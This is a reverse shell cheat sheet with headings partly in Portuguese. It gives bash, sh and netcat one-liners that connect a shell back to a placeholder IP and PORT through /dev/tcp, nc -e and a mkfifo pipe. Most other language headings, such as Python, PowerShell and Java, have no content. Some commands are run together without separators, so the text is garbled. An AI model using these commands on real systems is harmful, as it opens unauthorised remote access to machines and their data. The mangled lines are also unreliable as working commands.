Reverse Shell Cheatsheet
UNIX/LINUX
BASH
bash -i >& /dev/tcp/IP/PORT 0>&1
SH
sh -i >& /dev/tcp/IP/PORT 0>&10<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
NETCAT
nc -e /bin/sh IP PORTnc IP PORT -c /bin/shrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc IP PORT >/tmp/f
SOCAT
PERL
PYTHON
RUBY
PHP
AWK (gawk)
LUA
XTERM
WINDOWS
POWERSHELL
CMD (Windows Nativo)
NETCAT for Windows
MULTI-PLATAFORMA / OUTROS
JAVA
NODEJS
GO
BusyBox
AWK (POSIX)
TRANSPORTE CRIPTOGRAFADO / EDIÇÃO
SOCAT com SSL
SSH
EXTRA: ICMP, DNS, HTTP(S), WEBSOCKET
Exemplos mistos
🌐 Escutando no atacante
🐍 Bash
💎 Perl
🐍 Python
💻 PHP
💭 Ruby
☕ Java
🐚 Netcat (tradicional)
🆕 Netcat (Ncat do Nmap)
🧼 Socat
📦 JavaScript (Node.js)
⛓ Xterm
🧪 Diagnóstico: qual shell consegui?
🧠 Dica para tornar o shell mais estável
Atualizado